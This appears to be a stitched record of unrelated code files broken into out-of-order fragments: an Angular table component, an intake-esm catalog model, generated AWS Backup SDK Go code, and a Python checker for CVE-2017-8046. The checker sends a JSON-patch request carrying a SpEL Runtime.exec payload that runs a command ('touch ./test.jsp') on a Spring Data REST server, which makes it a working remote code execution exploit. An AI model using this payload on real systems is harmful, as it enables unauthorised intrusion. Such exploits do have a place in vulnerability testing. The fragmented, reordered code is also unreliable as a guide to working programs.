@Component({ selector : '', templateUrl : './app.component.html', styleUrls : [ './app.component.css' ], providers : [ CooTableService ] })
export class AppComponent {
metadata: ListingMetadata;
limit: number = 10;
rows: Array<Wine> = [];
public update = false;
private _doubleClicked: Array<any> = [];
constructor(private cooTableService: CooTableService, private wineService: WineService, private _activeRoute: ActivatedRoute, private _queryParams: ListingParameters,
cooTableConfig: CooTableConfig) {
cooTableConfig.routeChange = true;
this._queryParams.limit = this.limit;
this._queryParams.page = 1;
wineService.getAllWines(this._queryParams).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
const querySubscription = _activeRoute.queryParams.subscribe(data => {
console.log(data);
if (data.page) {
this._queryParams.page = data.page;
}
// querySubscription.unsubscribe();
if (data.sort && data.columName && !data.search && !data.filter) {
// Only Sort
this._queryParams.sort = data.sort;
this._queryParams.sortColumn = data.columName;
wineService.sortWines(this._queryParams, data.columName).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
});
} else if (data.search && !data.filter) {
this._queryParams.sort = data.sort;
this._queryParams.sortColumn = data.columName;
this._queryParams.filter = data.search;
this.wineService.filterAllColumns(this._queryParams).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
});
} else if (!data.search && data.filter) {
this._queryParams.sort = data.sort;
this._queryParams.sortColumn = data.columName;
const filterJSON = JSON.parse(data.filter);
for (const i in filterJSON) {
console.log(filterJSON[i]);
this._queryParams.attributeFilters.set(filterJSON[i]['column'], filterJSON[i]['filterValue']);
}
this.wineService.filterWines(this._queryParams).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
});
}
});
querySubscription.unsubscribe();
});
}
onClick(column) {
// In our example we show you how you can implement double and on click on the same row
// Best idea is to get all the click events in an array and reset them if the double click is hit
// Set the timout time to your needs
const timeout = setTimeout(() => {
let selectRow: boolean = true;
if (this.cooTableService.getSelectedRows().get(column.id)) {
selectRow = false;
}
this.cooTableService.selectRow(new CooTableRowSelectEvent(column.id, selectRow, column));
this.update = !this.update;
}, 200);
this._doubleClicked.push(timeout);
}
onDoubleClick(row) {
this._doubleClicked.forEach((doubleClicks) => {
clearTimeout(doubleClicks);
});
alert('Detail Ansicht für: ' + row.id);
// this.jTableService.cellDoubleClicked(row); | onTableChanged() {
}
filterTable(event: CooTableFilterEvent) {
console.log('Filter: ', event);
this._queryParams.attributeFilters.set(event.column, event.value);
if (event.value === '' || !event.value) {
this._queryParams.attributeFilters.delete(event.column);
}
this._queryParams.page = 1;
this.wineService.filterWines(this._queryParams).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
});
}
sortTable(event: CooTableSorterEvent) {
console.log('Sort:', event);
this._queryParams.sort = event.sort;
this._queryParams.sortColumn = event.field;
this.wineService.sortWines(this._queryParams, event.field).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
});
}
/**
* On Search we will filter with or on any possible column
*/
onSearch(event: CooTableSearchEvent): void {
console.log(event);
this._queryParams.filter = event.value;
this._queryParams.attributeFilters.clear();
this._queryParams.page = 1;
this.wineService.filterAllColumns(this._queryParams).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
});
}
public loadPage(event: CooTablePagerEvent) {
this._queryParams.limit = this.limit;
this._queryParams.page = event.page;
this.wineService.getAllWines(this._queryParams).subscribe((listingResult: Listing<Wine>) => {
this.metadata = listingResult.metadata;
this.rows = listingResult.results;
})
}
public onAllSelect(event: string): void {
if (event === 'UPDATE::SELECTED') {
this.update = !this.update;
}
}
} | }
|
CVE_2017_8046.py | #!/usr/bin/env python3
import json
from app.lib.utils.request import request
from app.lib.utils.common import get_useragent
class CVE_2017_8046_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'CVE-2017-8046漏洞',
'description': 'CVE-2017-8046漏洞可执行任意命令,执行的命令:/usr/bin/touch ./test.jsp,利用小葵转ascii转换为47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112,影响范围为: Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1)',
'date': '2017-04-21',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.headers1 = {
"User-Agent": get_useragent(),
"Content-Type": "application/json",
"Cache-Control": "no-cache"
}
self.headers2 = {
"User-Agent": get_useragent(),
"Content-Type": "application/json-patch+json",
"Cache-Control": "no-cache"
}
self.data1 = {
"firstName": "VulApps",
"lastName": "VulApps"
}
self.data2 = [{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112}))/lastName", "value": "vulapps-demo" }]
def check(self): | """
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
try:
response1 = request.post(self.url + '/customers', headers = self.headers1, data = json.dumps(self.data1))
response2 = request.patch(self.url + '/customers/1', headers = self.headers2, data = json.dumps(self.data2))
content2 = response2.text
if 'maybe not public' in content2:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == '__main__':
CVE_2017_8046 = CVE_2017_8046_BaseVerify('http://192.168.30.242:8086')
CVE_2017_8046.check() | |
cat.py | import enum
import json
import os
import pathlib
import typing
import fsspec
import pandas as pd
import pydantic
import tlz
from ._search import search, search_apply_require_all_on
class AggregationType(str, enum.Enum):
join_new = 'join_new'
join_existing = 'join_existing'
union = 'union'
class Config:
validate_all = True
validate_assignment = True
class DataFormat(str, enum.Enum):
netcdf = 'netcdf'
zarr = 'zarr'
class Config:
validate_all = True
validate_assignment = True
class Attribute(pydantic.BaseModel):
column_name: pydantic.StrictStr
vocabulary: pydantic.StrictStr = ''
class Config:
validate_all = True
validate_assignment = True
class Assets(pydantic.BaseModel):
column_name: pydantic.StrictStr
format: DataFormat
format_column_name: typing.Optional[pydantic.StrictStr]
class Config:
validate_all = True
validate_assignment = True
@pydantic.root_validator
def _validate_data_format(cls, values):
data_format, format_column_name = values.get('format'), values.get('format_column_name')
if data_format is not None and format_column_name is not None:
raise ValueError('Cannot set both format and format_column_name')
return values
class Aggregation(pydantic.BaseModel):
type: AggregationType
attribute_name: pydantic.StrictStr
options: typing.Optional[typing.Dict] = {}
class Config:
validate_all = True
validate_assignment = True
class AggregationControl(pydantic.BaseModel):
variable_column_name: pydantic.StrictStr
groupby_attrs: typing.List[pydantic.StrictStr]
aggregations: typing.List[Aggregation] = []
class Config:
validate_all = True
validate_assignment = True
class ESMCatalogModel(pydantic.BaseModel):
"""
Pydantic model for the ESM data catalog defined in https://git.io/JBWoW
"""
esmcat_version: pydantic.StrictStr
id: str
attributes: typing.List[Attribute]
assets: Assets
aggregation_control: AggregationControl
catalog_dict: typing.Optional[typing.List[typing.Dict]] = None
catalog_file: pydantic.StrictStr = None
description: pydantic.StrictStr = None
title: pydantic.StrictStr = None
_df: typing.Optional[typing.Any] = pydantic.PrivateAttr()
class Config:
validate_all = True
validate_assignment = True
@pydantic.root_validator
def validate_catalog(cls, values):
catalog_dict, catalog_file = values.get('catalog_dict'), values.get('catalog_file')
if catalog_dict is not None and catalog_file is not None:
raise ValueError('catalog_dict and catalog_file cannot be set at the same time')
return values
@classmethod
def from_dict(cls, data: typing.Dict) -> 'ESMCatalogModel':
esmcat = data['esmcat']
df = data['df']
cat = cls.parse_obj(esmcat)
cat._df = df
return cat
def save(self, name: str, *, directory: str = None, catalog_type: str = 'dict') -> None:
"""
Save the catalog to a file.
Parameters
-----------
name: str
The name of the file to save the catalog to.
directory: str
The directory to save the catalog to. If None, use the current directory
catalog_type: str
The type of catalog to save. Whether to save the catalog table as a dictionary
in the JSON file or as a separate CSV file. Valid options are 'dict' and 'file'.
Notes
-----
Large catalogs can result in large JSON files. To keep the JSON file size manageable, call with
`catalog_type='file'` to save catalog as a separate CSV file.
"""
if catalog_type not in {'file', 'dict'}:
raise ValueError(
f'catalog_type must be either "dict" or "file". Received catalog_type={catalog_type}'
)
csv_file_name = pathlib.Path(f'{name}.csv.gz')
json_file_name = pathlib.Path(f'{name}.json')
if directory:
directory = pathlib.Path(directory)
directory.mkdir(parents=True, exist_ok=True)
csv_file_name = directory / csv_file_name
json_file_name = directory / json_file_name
data = self.dict().copy()
for key in {'catalog_dict', 'catalog_file'}:
data.pop(key, None)
data['id'] = name
if catalog_type == 'file':
data['catalog_file'] = str(csv_file_name)
self.df.to_csv(csv_file_name, compression='gzip', index=False)
else:
data['catalog_dict'] = self.df.to_dict(orient='records')
with open(json_file_name, 'w') as outfile:
json.dump(data, outfile, indent=2)
print(f'Successfully wrote ESM collection json file to: {json_file_name}')
@classmethod
def load(
cls,
json_file: typing.Union[str, pydantic.FilePath, pydantic.AnyUrl],
storage_options: typing.Dict[str, typing.Any] = None,
read_csv_kwargs: typing.Dict[str, typing.Any] = None,
) -> 'ESMCatalogModel':
"""
Loads the catalog from a file
"""
storage_options = storage_options if storage_options is not None else {}
read_csv_kwargs = read_csv_kwargs or {}
_mapper = fsspec.get_mapper(json_file, **storage_options)
with fsspec.open(json_file, **storage_options) as fobj:
cat = cls.parse_raw(fobj.read())
if cat.catalog_file:
if _mapper.fs.exists(cat.catalog_file):
csv_path = cat.catalog_file
else:
csv_path = f'{os.path.dirname(_mapper.root)}/{cat.catalog_file}'
cat.catalog_file = csv_path
df = pd.read_csv(
cat.catalog_file,
storage_options=storage_options,
**read_csv_kwargs,
)
else:
df = pd.DataFrame(cat.catalog_dict)
cat._df = df
cat._cast_agg_columns_with_iterables()
return cat
@property
def columns_with_iterables(self) -> typing.Set[str]:
"""Return a set of columns that have iterables."""
if self._df.empty:
return set()
has_iterables = (
self._df.sample(20, replace=True)
.applymap(type)
.isin([list, tuple, set])
.any()
.to_dict()
)
return {column for column, check in has_iterables.items() if check}
@property
def has_multiple_variable_assets(self) -> bool:
"""Return True if the catalog has multiple variable assets."""
return self.aggregation_control.variable_column_name in self.columns_with_iterables
@property
def df(self) -> pd.DataFrame:
"""Return the dataframe."""
return self._df
@df.setter
def df(self, value: pd.DataFrame) -> None:
self._df = value
def _cast_agg_columns_with_iterables(self) -> None:
"""Cast all agg_columns with iterables to tuple values so as
to avoid hashing issues (e.g. TypeError: unhashable type: 'list')
"""
columns = list(
self.columns_with_iterables.intersection(
set(map(lambda agg: agg.attribute_name, self.aggregation_control.aggregations))
)
)
if columns:
self._df[columns] = self._df[columns].apply(tuple)
@property
def grouped(self) -> typing.Union[pd.core.groupby.DataFrameGroupBy, pd.DataFrame]:
if self.aggregation_control.groupby_attrs and set(
self.aggregation_control.groupby_attrs
) != set(self.df.columns):
return self.df.groupby(self.aggregation_control.groupby_attrs)
return self.df
def _construct_group_keys(
self, sep: str = '.'
) -> typing.Dict[str, typing.Union[str, typing.Tuple[str]]]:
grouped = self.grouped
if isinstance(grouped, pd.core.groupby.generic.DataFrameGroupBy):
internal_keys = grouped.groups.keys()
public_keys = map(
lambda key: key if isinstance(key, str) else sep.join(str(value) for value in key),
internal_keys,
)
else:
internal_keys = grouped.index
public_keys = (
grouped[grouped.columns.tolist()]
.apply(lambda row: sep.join(str(v) for v in row), axis=1)
.tolist()
)
return dict(zip(public_keys, internal_keys))
def _unique(self) -> typing.Dict:
def _find_unique(series):
values = series.dropna()
if series.name in self.columns_with_iterables:
|
return list(tlz.unique(values))
data = self.df[self.df.columns]
if data.empty:
return {col: [] for col in self.df.columns}
else:
return data.apply(_find_unique, result_type='reduce').to_dict()
def unique(self) -> pd.Series:
return pd.Series(self._unique())
def nunique(self) -> pd.Series:
return pd.Series(tlz.valmap(len, self._unique()))
def search(
self,
*,
query: typing.Union['QueryModel', typing.Dict[str, typing.Any]],
require_all_on: typing.Union[str, typing.List[str]] = None,
) -> 'ESMCatalogModel':
"""
Search for entries in the catalog.
Parameters
----------
query: dict, optional
A dictionary of query parameters to execute against the dataframe.
require_all_on : list, str, optional
A dataframe column or a list of dataframe columns across
which all entries must satisfy the query criteria.
If None, return entries that fulfill any of the criteria specified
in the query, by default None.
"""
if not isinstance(query, QueryModel):
_query = QueryModel(
query=query, require_all_on=require_all_on, columns=self.df.columns.tolist()
)
else:
_query = query
results = search(
df=self.df, query=_query.query, columns_with_iterables=self.columns_with_iterables
)
if _query.require_all_on is not None and not results.empty:
results = search_apply_require_all_on(
df=results, query=_query.query, require_all_on=_query.require_all_on
)
return results
class QueryModel(pydantic.BaseModel):
query: typing.Dict[pydantic.StrictStr, typing.Union[typing.Any, typing.List[typing.Any]]]
columns: typing.List[str]
require_all_on: typing.Union[str, typing.List[typing.Any]] = None
class Config:
validate_all = True
validate_assignment = True
@pydantic.root_validator(pre=False)
def validate_query(cls, values):
query = values.get('query', {})
columns = values.get('columns')
require_all_on = values.get('require_all_on', [])
if query:
for key in query:
if key not in columns:
raise ValueError(f'Column {key} not in columns {columns}')
if isinstance(require_all_on, str):
values['require_all_on'] = [require_all_on]
if require_all_on is not None:
for key in values['require_all_on']:
if key not in columns:
raise ValueError(f'Column {key} not in columns {columns}')
_query = query.copy()
for key, value in _query.items():
if isinstance(value, (str, int, float, bool)):
_query[key] = [value]
values['query'] = _query
return values
| values = tlz.concat(values) |
api.go | // Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.
package backup
import (
"fmt"
"time"
"github.com/ClearcodeHQ/aws-sdk-go/aws"
"github.com/ClearcodeHQ/aws-sdk-go/aws/awsutil"
"github.com/ClearcodeHQ/aws-sdk-go/aws/request"
"github.com/ClearcodeHQ/aws-sdk-go/private/protocol"
"github.com/ClearcodeHQ/aws-sdk-go/private/protocol/restjson"
)
const opCreateBackupPlan = "CreateBackupPlan"
// CreateBackupPlanRequest generates a "aws/request.Request" representing the
// client's request for the CreateBackupPlan operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See CreateBackupPlan for more information on using the CreateBackupPlan
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the CreateBackupPlanRequest method.
// req, resp := client.CreateBackupPlanRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/CreateBackupPlan
func (c *Backup) CreateBackupPlanRequest(input *CreateBackupPlanInput) (req *request.Request, output *CreateBackupPlanOutput) {
op := &request.Operation{
Name: opCreateBackupPlan,
HTTPMethod: "PUT",
HTTPPath: "/backup/plans/",
}
if input == nil {
input = &CreateBackupPlanInput{}
}
output = &CreateBackupPlanOutput{}
req = c.newRequest(op, input, output)
return
}
// CreateBackupPlan API operation for AWS Backup.
//
// Creates a backup plan using a backup plan name and backup rules. A backup
// plan is a document that contains information that AWS Backup uses to schedule
// tasks that create recovery points for resources.
//
// If you call CreateBackupPlan with a plan that already exists, an AlreadyExistsException
// is returned.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation CreateBackupPlan for usage and error information.
//
// Returned Error Types:
// * LimitExceededException
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
//
// * AlreadyExistsException
// The required resource already exists.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/CreateBackupPlan
func (c *Backup) CreateBackupPlan(input *CreateBackupPlanInput) (*CreateBackupPlanOutput, error) {
req, out := c.CreateBackupPlanRequest(input)
return out, req.Send()
}
// CreateBackupPlanWithContext is the same as CreateBackupPlan with the addition of
// the ability to pass a context and additional request options.
//
// See CreateBackupPlan for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) CreateBackupPlanWithContext(ctx aws.Context, input *CreateBackupPlanInput, opts ...request.Option) (*CreateBackupPlanOutput, error) {
req, out := c.CreateBackupPlanRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opCreateBackupSelection = "CreateBackupSelection"
// CreateBackupSelectionRequest generates a "aws/request.Request" representing the
// client's request for the CreateBackupSelection operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See CreateBackupSelection for more information on using the CreateBackupSelection
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the CreateBackupSelectionRequest method.
// req, resp := client.CreateBackupSelectionRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/CreateBackupSelection
func (c *Backup) CreateBackupSelectionRequest(input *CreateBackupSelectionInput) (req *request.Request, output *CreateBackupSelectionOutput) {
op := &request.Operation{
Name: opCreateBackupSelection,
HTTPMethod: "PUT",
HTTPPath: "/backup/plans/{backupPlanId}/selections/",
}
if input == nil {
input = &CreateBackupSelectionInput{}
}
output = &CreateBackupSelectionOutput{}
req = c.newRequest(op, input, output)
return
}
// CreateBackupSelection API operation for AWS Backup.
//
// Creates a JSON document that specifies a set of resources to assign to a
// backup plan. Resources can be included by specifying patterns for a ListOfTags
// and selected Resources.
//
// For example, consider the following patterns:
//
// * Resources: "arn:aws:ec2:region:account-id:volume/volume-id"
//
// * ConditionKey:"department" ConditionValue:"finance" ConditionType:"StringEquals"
//
// * ConditionKey:"importance" ConditionValue:"critical" ConditionType:"StringEquals"
//
// Using these patterns would back up all Amazon Elastic Block Store (Amazon
// EBS) volumes that are tagged as "department=finance", "importance=critical",
// in addition to an EBS volume with the specified volume ID.
//
// Resources and conditions are additive in that all resources that match the
// pattern are selected. This shouldn't be confused with a logical AND, where
// all conditions must match. The matching patterns are logically put together
// using the OR operator. In other words, all patterns that match are selected
// for backup.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation CreateBackupSelection for usage and error information.
//
// Returned Error Types:
// * LimitExceededException
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
//
// * AlreadyExistsException
// The required resource already exists.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/CreateBackupSelection
func (c *Backup) CreateBackupSelection(input *CreateBackupSelectionInput) (*CreateBackupSelectionOutput, error) {
req, out := c.CreateBackupSelectionRequest(input)
return out, req.Send()
}
// CreateBackupSelectionWithContext is the same as CreateBackupSelection with the addition of
// the ability to pass a context and additional request options.
//
// See CreateBackupSelection for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) CreateBackupSelectionWithContext(ctx aws.Context, input *CreateBackupSelectionInput, opts ...request.Option) (*CreateBackupSelectionOutput, error) {
req, out := c.CreateBackupSelectionRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opCreateBackupVault = "CreateBackupVault"
// CreateBackupVaultRequest generates a "aws/request.Request" representing the
// client's request for the CreateBackupVault operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See CreateBackupVault for more information on using the CreateBackupVault
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the CreateBackupVaultRequest method.
// req, resp := client.CreateBackupVaultRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/CreateBackupVault
func (c *Backup) CreateBackupVaultRequest(input *CreateBackupVaultInput) (req *request.Request, output *CreateBackupVaultOutput) {
op := &request.Operation{
Name: opCreateBackupVault,
HTTPMethod: "PUT",
HTTPPath: "/backup-vaults/{backupVaultName}",
}
if input == nil {
input = &CreateBackupVaultInput{}
}
output = &CreateBackupVaultOutput{}
req = c.newRequest(op, input, output)
return
}
// CreateBackupVault API operation for AWS Backup.
//
// Creates a logical container where backups are stored. A CreateBackupVault
// request includes a name, optionally one or more resource tags, an encryption
// key, and a request ID.
//
// Sensitive data, such as passport numbers, should not be included the name
// of a backup vault.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation CreateBackupVault for usage and error information.
//
// Returned Error Types:
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * LimitExceededException
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
//
// * AlreadyExistsException
// The required resource already exists.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/CreateBackupVault
func (c *Backup) CreateBackupVault(input *CreateBackupVaultInput) (*CreateBackupVaultOutput, error) {
req, out := c.CreateBackupVaultRequest(input)
return out, req.Send()
}
// CreateBackupVaultWithContext is the same as CreateBackupVault with the addition of
// the ability to pass a context and additional request options.
//
// See CreateBackupVault for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) CreateBackupVaultWithContext(ctx aws.Context, input *CreateBackupVaultInput, opts ...request.Option) (*CreateBackupVaultOutput, error) {
req, out := c.CreateBackupVaultRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDeleteBackupPlan = "DeleteBackupPlan"
// DeleteBackupPlanRequest generates a "aws/request.Request" representing the
// client's request for the DeleteBackupPlan operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DeleteBackupPlan for more information on using the DeleteBackupPlan
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DeleteBackupPlanRequest method.
// req, resp := client.DeleteBackupPlanRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupPlan
func (c *Backup) DeleteBackupPlanRequest(input *DeleteBackupPlanInput) (req *request.Request, output *DeleteBackupPlanOutput) {
op := &request.Operation{
Name: opDeleteBackupPlan,
HTTPMethod: "DELETE",
HTTPPath: "/backup/plans/{backupPlanId}",
}
if input == nil {
input = &DeleteBackupPlanInput{}
}
output = &DeleteBackupPlanOutput{}
req = c.newRequest(op, input, output)
return
}
// DeleteBackupPlan API operation for AWS Backup.
//
// Deletes a backup plan. A backup plan can only be deleted after all associated
// selections of resources have been deleted. Deleting a backup plan deletes
// the current version of a backup plan. Previous versions, if any, will still
// exist.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DeleteBackupPlan for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupPlan
func (c *Backup) DeleteBackupPlan(input *DeleteBackupPlanInput) (*DeleteBackupPlanOutput, error) {
req, out := c.DeleteBackupPlanRequest(input)
return out, req.Send()
}
// DeleteBackupPlanWithContext is the same as DeleteBackupPlan with the addition of
// the ability to pass a context and additional request options.
//
// See DeleteBackupPlan for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DeleteBackupPlanWithContext(ctx aws.Context, input *DeleteBackupPlanInput, opts ...request.Option) (*DeleteBackupPlanOutput, error) {
req, out := c.DeleteBackupPlanRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDeleteBackupSelection = "DeleteBackupSelection"
// DeleteBackupSelectionRequest generates a "aws/request.Request" representing the
// client's request for the DeleteBackupSelection operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DeleteBackupSelection for more information on using the DeleteBackupSelection
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DeleteBackupSelectionRequest method.
// req, resp := client.DeleteBackupSelectionRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupSelection
func (c *Backup) DeleteBackupSelectionRequest(input *DeleteBackupSelectionInput) (req *request.Request, output *DeleteBackupSelectionOutput) {
op := &request.Operation{
Name: opDeleteBackupSelection,
HTTPMethod: "DELETE",
HTTPPath: "/backup/plans/{backupPlanId}/selections/{selectionId}",
}
if input == nil {
input = &DeleteBackupSelectionInput{}
}
output = &DeleteBackupSelectionOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// DeleteBackupSelection API operation for AWS Backup.
//
// Deletes the resource selection associated with a backup plan that is specified
// by the SelectionId.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DeleteBackupSelection for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupSelection
func (c *Backup) DeleteBackupSelection(input *DeleteBackupSelectionInput) (*DeleteBackupSelectionOutput, error) {
req, out := c.DeleteBackupSelectionRequest(input)
return out, req.Send()
}
// DeleteBackupSelectionWithContext is the same as DeleteBackupSelection with the addition of
// the ability to pass a context and additional request options.
//
// See DeleteBackupSelection for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DeleteBackupSelectionWithContext(ctx aws.Context, input *DeleteBackupSelectionInput, opts ...request.Option) (*DeleteBackupSelectionOutput, error) {
req, out := c.DeleteBackupSelectionRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDeleteBackupVault = "DeleteBackupVault"
// DeleteBackupVaultRequest generates a "aws/request.Request" representing the
// client's request for the DeleteBackupVault operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DeleteBackupVault for more information on using the DeleteBackupVault
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DeleteBackupVaultRequest method.
// req, resp := client.DeleteBackupVaultRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupVault
func (c *Backup) DeleteBackupVaultRequest(input *DeleteBackupVaultInput) (req *request.Request, output *DeleteBackupVaultOutput) {
op := &request.Operation{
Name: opDeleteBackupVault,
HTTPMethod: "DELETE",
HTTPPath: "/backup-vaults/{backupVaultName}",
}
if input == nil {
input = &DeleteBackupVaultInput{}
}
output = &DeleteBackupVaultOutput{}
req = c.newRequest(op, input, output)
